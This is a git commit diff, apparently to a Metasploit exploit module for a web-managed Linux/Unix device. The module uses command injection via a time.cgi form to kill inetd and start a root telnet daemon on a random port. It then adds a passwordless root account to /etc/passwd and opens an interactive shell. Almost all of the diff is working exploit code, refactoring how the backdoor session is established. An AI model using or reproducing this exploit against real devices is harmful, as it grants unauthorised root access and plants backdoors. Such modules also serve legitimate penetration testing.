thx to juan ... session stuff looks better

bug/bundler_fix
m-1-k-3 2013-08-14 16:51:09 +02:00
parent 885417c9d9
commit 6b87240323
1 changed files with 63 additions and 56 deletions

View File

@ -43,61 +43,55 @@ class Metasploit3 < Msf::Exploit::Remote
'Platform' => ['linux','unix'], 'Platform' => ['linux','unix'],
'Payload' => 'Payload' =>
{ {
'DisableNops' => true, 'Compat' => {
'PayloadType' => 'cmd_interact',
'ConnectionType' => 'find',
}, },
},
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
'Targets' => 'Targets' =>
[ [
[ 'CMD', #all devices [ 'Automatic', { } ],
{
'Arch' => ARCH_CMD,
'Platform' => 'unix'
}
], ],
[ 'Telnet', #all devices - default target 'DefaultTarget' => 0
{
'Arch' => ARCH_CMD,
'Platform' => 'unix'
}
],
],
'DefaultTarget' => 1
)) ))
register_options(
[
OptString.new('USERNAME',[ true, 'User to login with', 'admin']),
OptString.new('PASSWORD',[ false, 'Password to login with', 'admin']),
], self.class)
register_advanced_options(
[
OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]),
OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25])
], self.class)
end
def tel_timeout
(datastore['TelnetTimeout'] || 10).to_i
end
def banner_timeout
(datastore['TelnetBannerTimeout'] || 25).to_i
end end
def exploit def exploit
@response_pattern = "\<FORM\ NAME\=\"form\"\ METHOD\=\"POST\"\ ACTION\=\"\/cgi\/time\/time.cgi\"\ ENCTYPE\=\"multipart\/form-data" @response_pattern = "\<FORM\ NAME\=\"form\"\ METHOD\=\"POST\"\ ACTION\=\"\/cgi\/time\/time.cgi\"\ ENCTYPE\=\"multipart\/form-data"
if target.name =~ /CMD/
exploit_cmd
else
exploit_telnet exploit_telnet
end end
end
def exploit_cmd
if not (datastore['CMD'])
fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
end
print_status("#{rhost}:#{rport} - Sending remote command")
res = request(payload.encoded)
if (!res or res.code != 200 or res.body !~ /#{@response_pattern}/)
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
end
print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state\n")
return
end
def exploit_telnet def exploit_telnet
telnetport = rand(65535) telnetport = rand(65535)
vprint_status("#{rhost}:#{rport} - Telnetport: #{telnetport}") print_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")
#first request #first request
cmd = "killall inetd" cmd = "killall inetd"
cmd = Rex::Text.uri_encode(cmd) cmd = Rex::Text.uri_encode(cmd)
vprint_status("#{rhost}:#{rport} - sending first request - killing inetd") print_status("#{rhost}:#{rport} - sending first request - killing inetd")
res = request(cmd) res = request(cmd)
#no server header or something that we could use to get sure the command is executed #no server header or something that we could use to get sure the command is executed
@ -109,7 +103,8 @@ class Metasploit3 < Msf::Exploit::Remote
inetd_cfg = rand_text_alpha(8) inetd_cfg = rand_text_alpha(8)
cmd = "echo \"#{telnetport} stream tcp nowait root /usr/sbin/telnetd telnetd\" > /tmp/#{inetd_cfg}" cmd = "echo \"#{telnetport} stream tcp nowait root /usr/sbin/telnetd telnetd\" > /tmp/#{inetd_cfg}"
cmd = Rex::Text.uri_encode(cmd) cmd = Rex::Text.uri_encode(cmd)
vprint_status("#{rhost}:#{rport} - sending second request - configure inetd") print_status("#{rhost}:#{rport} - sending second request - configure inetd")
register_file_for_cleanup("/tmp/#{inetd_cfg}")
res = request(cmd) res = request(cmd)
#no server header or something that we could use to get sure the command is executed #no server header or something that we could use to get sure the command is executed
@ -120,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote
#third request #third request
cmd = "/usr/sbin/inetd /tmp/#{inetd_cfg}" cmd = "/usr/sbin/inetd /tmp/#{inetd_cfg}"
cmd = Rex::Text.uri_encode(cmd) cmd = Rex::Text.uri_encode(cmd)
vprint_status("#{rhost}:#{rport} - sending third request - starting inetd and telnetd") print_status("#{rhost}:#{rport} - sending third request - starting inetd and telnetd")
res = request(cmd) res = request(cmd)
#no server header or something that we could use to get sure the command is executed #no server header or something that we could use to get sure the command is executed
@ -132,7 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote
user = rand_text_alpha(6) user = rand_text_alpha(6)
cmd = "echo \"#{user}::0:0:/:/bin/ash\" >> /etc/passwd" cmd = "echo \"#{user}::0:0:/:/bin/ash\" >> /etc/passwd"
cmd = Rex::Text.uri_encode(cmd) cmd = Rex::Text.uri_encode(cmd)
vprint_status("#{rhost}:#{rport} - sending fourth request - configure user #{user}") print_status("#{rhost}:#{rport} - sending fourth request - configure user #{user}")
res = request(cmd) res = request(cmd)
#no server header or something that we could use to get sure the command is executed #no server header or something that we could use to get sure the command is executed
@ -140,12 +135,10 @@ class Metasploit3 < Msf::Exploit::Remote
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
end end
begin begin
print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...")
sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i }) sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
if sock if sock.nil?
print_good("#{rhost}:#{rport} - Backdoor service has been spawned, handling...")
add_socket(sock)
else
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
end end
@ -160,18 +153,17 @@ class Metasploit3 < Msf::Exploit::Remote
:active => true :active => true
} }
report_auth_info(auth_info) report_auth_info(auth_info)
merge_me = { prompt = negotiate_telnet(sock)
'USERPASS_FILE' => nil, if prompt.nil?
'USER_FILE' => nil, sock.close
'PASS_FILE' => nil, fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a telnet session")
'USERNAME' => user, else
'PASSWORD' => nil print_good("#{rhost}:#{rport} - Telnet session successfully established...")
} end
sock.put(user) sock.put(user)
sock.put("\r\n") sock.put("\r\n")
sock.put("rm /tmp/#{inetd_cfg}") handler(sock)
sock.put("\r\n")
start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock)
rescue rescue
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
end end
@ -209,4 +201,19 @@ class Metasploit3 < Msf::Exploit::Remote
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice") fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice")
end end
end end
def negotiate_telnet(sock)
begin
Timeout.timeout(banner_timeout) do
while(true)
data = sock.get_once(-1, tel_timeout)
return nil if not data or data.length == 0
if data =~ /login/
return true
end
end
end
rescue ::Timeout::Error
return nil
end
end
end end